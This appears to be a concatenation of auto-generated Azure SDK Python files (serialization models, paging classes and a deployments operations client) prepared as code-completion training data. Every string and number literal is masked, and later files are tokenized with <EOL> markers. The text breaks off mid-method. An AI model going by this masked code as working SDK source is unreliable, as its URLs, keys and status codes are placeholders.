        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, id=None, version=None, storage_url=None, storage_url_expiry=None):
        self.id = id
        self.version = version
        self.storage_url = storage_url
        self.storage_url_expiry = storage_url_expiry
from msrest.serialization import Model


class CheckNameAvailabilityOutput(Model):
    """Result of a name-availability check (flag plus reason/message)."""

    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:bool>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:message>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, name_available=None, reason=None, message=None):
        self.name_available = name_available
        self.reason = reason
        self.message = message
from .profiles_operations import ProfilesOperations
from .endpoints_operations import EndpointsOperations
from .origins_operations import OriginsOperations
from .custom_domains_operations import CustomDomainsOperations
from .name_availability_operations import NameAvailabilityOperations
from .operations_operations import OperationsOperations

# Explicit public API of this operations package.
__all__ = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]
from msrest.serialization import Model


class DiskInstanceView(Model):
    """Instance view of a disk: a name plus a list of statuses."""

    _attribute_map = {
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, name=None, statuses=None):
        self.name = name
        self.statuses = statuses
from .resource import Resource


class VirtualMachine(Resource):
    """Serialization model for a virtual machine resource.

    ``instance_view`` and ``resources`` are read-only (server-populated)
    and are therefore initialized to None rather than taken as parameters.
    """

    _validation = {
        '<STR_LIT:id>': {'<STR_LIT>': True},
        '<STR_LIT:name>': {'<STR_LIT>': True},
        '<STR_LIT:type>': {'<STR_LIT>': True},
        '<STR_LIT:location>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:type>': {'<STR_LIT:key>': '<STR_LIT:type>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:location>': {'<STR_LIT:key>': '<STR_LIT:location>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, location, tags=None, plan=None, hardware_profile=None,
                 storage_profile=None, os_profile=None, network_profile=None,
                 diagnostics_profile=None, availability_set=None,
                 provisioning_state=None, license_type=None, vm_id=None):
        super(VirtualMachine, self).__init__(location=location, tags=tags)
        self.plan = plan
        self.hardware_profile = hardware_profile
        self.storage_profile = storage_profile
        self.os_profile = os_profile
        self.network_profile = network_profile
        self.diagnostics_profile = diagnostics_profile
        self.availability_set = availability_set
        self.provisioning_state = provisioning_state
        # Read-only, populated by the service.
        self.instance_view = None
        self.license_type = license_type
        self.vm_id = vm_id
        # Read-only, populated by the service.
        self.resources = None
from msrest.serialization import Model


class VirtualMachineScaleSetVMExtensionsSummary(Model):
    """Extensions summary for a scale-set VM; both fields are read-only."""

    _validation = {
        '<STR_LIT:name>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self):
        # Server-populated; never set by the caller.
        self.name = None
        self.statuses_summary = None
from msrest.serialization import Model


class AddStorageAccountParameters(Model):
    """Parameters for adding a storage account; 'properties' is required."""

    _validation = {
        '<STR_LIT>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, properties):
        self.properties = properties
from enum import Enum


class FileType(Enum):
    """Kind of file associated with a task.

    NOTE: both member values are the same masked literal, so ``resource``
    is an alias of ``assembly`` under Enum's value-aliasing rules —
    preserved exactly as in the original.
    """
    assembly = "<STR_LIT>"
    resource = "<STR_LIT>"
from msrest.paging import Paged


class USqlTableStatisticsPaged(Paged):
    """Paging container for iterating over U-SQL table statistics objects."""

    # Wire-format mapping used by the msrest paging machinery.
    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT:value>', '<STR_LIT:type>': '<STR_LIT>'}
    }

    def __init__(self, *args, **kwargs):
        # All behaviour comes from the generic Paged base class.
        super(USqlTableStatisticsPaged, self).__init__(*args, **kwargs)
# Package version string (value masked in this corpus).
VERSION = "<STR_LIT>"
from msrest.serialization import Model


class FileStatusProperties(Model):
    """File status entry (WebHDFS-style fields); every field is read-only."""

    _validation = {
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT>': {'<STR_LIT>': True},
        '<STR_LIT:type>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:type>': {'<STR_LIT:key>': '<STR_LIT:type>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self):
        # All server-populated; the constructor takes no arguments.
        self.access_time = None
        self.block_size = None
        self.children_num = None
        self.group = None
        self.length = None
        self.modification_time = None
        self.owner = None
        self.path_suffix = None
        self.permission = None
        self.type = None
from msrest.serialization import Model


class WorkflowRunActionFilter(Model):
    """Filter for workflow-run actions; only a status field."""

    _attribute_map = {
        '<STR_LIT:status>': {'<STR_LIT:key>': '<STR_LIT:status>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, status=None):
        self.status = status
from .sub_resource import SubResource


class ApplicationGatewayBackendAddressPool(SubResource):
    """Backend address pool of an application gateway."""

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, id=None, backend_ip_configurations=None, backend_addresses=None,
                 provisioning_state=None, name=None, etag=None):
        super(ApplicationGatewayBackendAddressPool, self).__init__(id=id)
        self.backend_ip_configurations = backend_ip_configurations
        self.backend_addresses = backend_addresses
        self.provisioning_state = provisioning_state
        self.name = name
        self.etag = etag
from .sub_resource import SubResource


class ExpressRouteCircuitPeering(SubResource):
    """Peering configuration of an ExpressRoute circuit."""

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT:state>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:int>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:int>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:int>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, id=None, peering_type=None, state=None, azure_asn=None,
                 peer_asn=None, primary_peer_address_prefix=None,
                 secondary_peer_address_prefix=None, primary_azure_port=None,
                 secondary_azure_port=None, shared_key=None, vlan_id=None,
                 microsoft_peering_config=None, stats=None,
                 provisioning_state=None, name=None, etag=None):
        super(ExpressRouteCircuitPeering, self).__init__(id=id)
        self.peering_type = peering_type
        self.state = state
        self.azure_asn = azure_asn
        self.peer_asn = peer_asn
        self.primary_peer_address_prefix = primary_peer_address_prefix
        self.secondary_peer_address_prefix = secondary_peer_address_prefix
        self.primary_azure_port = primary_azure_port
        self.secondary_azure_port = secondary_azure_port
        self.shared_key = shared_key
        self.vlan_id = vlan_id
        self.microsoft_peering_config = microsoft_peering_config
        self.stats = stats
        self.provisioning_state = provisioning_state
        self.name = name
        self.etag = etag
from .resource import Resource


class NetworkSecurityGroup(Resource):
    """Serialization model for a network security group resource."""

    # 'name' and 'type' are read-only on this resource.
    _validation = {
        '<STR_LIT:name>': {'<STR_LIT>': True},
        '<STR_LIT:type>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:type>': {'<STR_LIT:key>': '<STR_LIT:type>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:location>': {'<STR_LIT:key>': '<STR_LIT:location>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, id=None, location=None, tags=None, security_rules=None,
                 default_security_rules=None, network_interfaces=None, subnets=None,
                 resource_guid=None, provisioning_state=None, etag=None):
        super(NetworkSecurityGroup, self).__init__(id=id, location=location, tags=tags)
        self.security_rules = security_rules
        self.default_security_rules = default_security_rules
        self.network_interfaces = network_interfaces
        self.subnets = subnets
        self.resource_guid = resource_guid
        self.provisioning_state = provisioning_state
        self.etag = etag
<s> from . sub_resource import SubResource <EOL> class VpnClientRootCertificate ( SubResource ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , id = None , public_cert_data = None , provisioning_state = None , name = None , etag = None ) : <EOL> super ( VpnClientRootCertificate , self ) . __init__ ( id = id ) <EOL> self . public_cert_data = public_cert_data <EOL> self . provisioning_state = provisioning_state <EOL> self . name = name <EOL> self . etag = etag </s>
<s> from msrest . serialization import Model <EOL> class BaiduCredential ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , properties = None ) : <EOL> self . properties = properties </s>
<s> VERSION = "<STR_LIT>" </s>
<s> from msrest . serialization import Model <EOL> class GenericResourceFilter ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , resource_type = None , tagname = None , tagvalue = None ) : <EOL> self . resource_type = resource_type <EOL> self . tagname = tagname <EOL> self . tagvalue = tagvalue </s>
<s> from msrest . serialization import Model <EOL> class DeploymentValidateResult ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:error>' : { '<STR_LIT:key>' : '<STR_LIT:error>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , error = None , properties = None ) : <EOL> self . error = error <EOL> self . properties = properties </s>
<s> from msrest . pipeline import ClientRawResponse <EOL> from msrestazure . azure_exceptions import CloudError <EOL> from msrestazure . azure_operation import AzureOperationPoller <EOL> import uuid <EOL> from . . import models <EOL> class DeploymentsOperations ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , config , serializer , deserializer ) : <EOL> self . _client = client <EOL> self . _serialize = serializer <EOL> self . _deserialize = deserializer <EOL> self . config = config <EOL> def delete ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> def long_running_send ( ) : <EOL> request = self . _client . delete ( url , query_parameters ) <EOL> return self . _client . 
send ( request , header_parameters , ** operation_config ) <EOL> def get_long_running_status ( status_link , headers = { } ) : <EOL> request = self . _client . get ( status_link ) <EOL> request . headers . update ( headers ) <EOL> return self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> def get_long_running_output ( response ) : <EOL> if response . status_code not in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( None , response ) <EOL> return client_raw_response <EOL> if raw : <EOL> response = long_running_send ( ) <EOL> return get_long_running_output ( response ) <EOL> long_running_operation_timeout = operation_config . get ( <EOL> '<STR_LIT>' , <EOL> self . config . long_running_operation_timeout ) <EOL> return AzureOperationPoller ( <EOL> long_running_send , get_long_running_output , <EOL> get_long_running_status , long_running_operation_timeout ) <EOL> def check_existence ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . 
generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . head ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = ( response . status_code == <NUM_LIT> ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def create_or_update ( <EOL> self , resource_group_name , deployment_name , properties = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> parameters = models . Deployment ( properties = properties ) <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . 
generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> body_content = self . _serialize . body ( parameters , '<STR_LIT>' ) <EOL> def long_running_send ( ) : <EOL> request = self . _client . put ( url , query_parameters ) <EOL> return self . _client . send ( <EOL> request , header_parameters , body_content , ** operation_config ) <EOL> def get_long_running_status ( status_link , headers = { } ) : <EOL> request = self . _client . get ( status_link ) <EOL> request . headers . update ( headers ) <EOL> return self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> def get_long_running_output ( response ) : <EOL> if response . status_code not in [ <NUM_LIT:200> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if response . status_code == <NUM_LIT> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> if raw : <EOL> response = long_running_send ( ) <EOL> return get_long_running_output ( response ) <EOL> long_running_operation_timeout = operation_config . get ( <EOL> '<STR_LIT>' , <EOL> self . config . 
long_running_operation_timeout ) <EOL> return AzureOperationPoller ( <EOL> long_running_send , get_long_running_output , <EOL> get_long_running_status , long_running_operation_timeout ) <EOL> def get ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . get ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . 
_deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def cancel ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . 
get ( '<STR_LIT>' ) <EOL> raise exp <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( None , response ) <EOL> return client_raw_response <EOL> def validate ( <EOL> self , resource_group_name , deployment_name , properties = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> parameters = models . Deployment ( properties = properties ) <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> 